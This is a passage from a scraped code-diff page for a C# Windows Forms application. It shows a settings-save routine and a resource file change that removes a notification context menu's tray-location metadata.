Properties.Settings.Default.Notification = true;
|
||||||
|
toolStripStatusLabel2.ForeColor = Color.Green;
|
||||||
|
}
|
||||||
|
Properties.Settings.Default.Save();
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -150,9 +150,6 @@
|
|||||||
<metadata name="notifyIcon1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
|
<metadata name="notifyIcon1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
|
||||||
<value>540, 65</value>
|
<value>540, 65</value>
|
||||||
</metadata>
|
</metadata>
|
||||||
<metadata name="contextMenuNotification.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
|
|
||||||
<value>17, 65</value>
|
|
||||||
</metadata>
|
|
||||||
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
|
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
|
||||||
<data name="notifyIcon1.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
<data name="notifyIcon1.Icon" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
||||||
<value>
|
<value>
|
||||||
|
Loading…
x
Reference in New Issue
Block a user